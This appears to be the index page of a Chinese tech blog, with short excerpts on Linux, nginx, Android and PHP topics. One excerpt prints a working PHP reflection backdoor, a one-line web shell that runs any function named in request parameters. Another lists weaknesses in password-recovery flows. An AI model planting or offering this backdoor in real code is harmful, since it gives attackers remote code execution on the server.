Zypper用法

Nov 10,2014 in Linux read (4533)

列出已定义仓库zypper repos刷新仓库zypper ref

继续阅读

PHP反射后门

Nov 07,2014 in Web,安全研究 read (4233)

<?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c]));?>

继续阅读

Nov 03,2014 in Web read (4346)

location匹配命令~ #波浪线表示执行一个正则匹配，区分大小写~* #表示执行一个正则匹配，不区分大小写^~ #^~表示普通字符匹配，如果该选项匹配，只匹配该选项，不匹配别的选项，一般用来匹配目录= #进行普通字符精确匹配@ #...

继续阅读

Oct 31,2014 in Android read (4549)

注册广播的方式有两种：在代码中动态注册，或是在AndroidManifest.xml中进行静态注册。如果想要创建一个广播接收器，新建一个类，继承自BroadcastReceiver，并且继承父类的onReceive()方法。package com.broadcasttest...

继续阅读

Oct 28,2014 in 安全研究 read (8596)

0x00 密码找回凭证太弱，可以被爆破0x01 密码找回凭证可以在客户端获取在密码找回时抓包分析，看看有没有token的出现。0x02 找回密码的答案在网页源码中出现0x03 找回密码的验证比较薄弱比如找回密码的链接，最后的token是当前时间戳的md5值，或者是用户名加时...

继续阅读

Oct 21,2014 in Android read (4163)

听说Android出了5.0，作为一名合格的开发者，必须前去看一看，更新个SDK。谁料因为寡妇王的原因，更新速度极慢，找到了个好方法。打开SDK Manager，Tools->Options，代理里面写上mirrors.neusoft.edu.cnubuntu.buc...

继续阅读

Oct 20,2014 in Web,Code Review read (3913)

HTML:<form action="" method="post" enctype="multipart/form-data"><p>Pictures:<input type=&qu...

继续阅读

Oct 19,2014 in Web,安全研究,Code Review read (4334)

You'd better check $_FILES structure and values throughly.The following code cannot cause any errors absolutely.Example:<?phpheader('C...

继续阅读

Oct 15,2014 in Linux read (4379)

sudo apt-get install manpages-devsudo apt-get install glibc-doc

继续阅读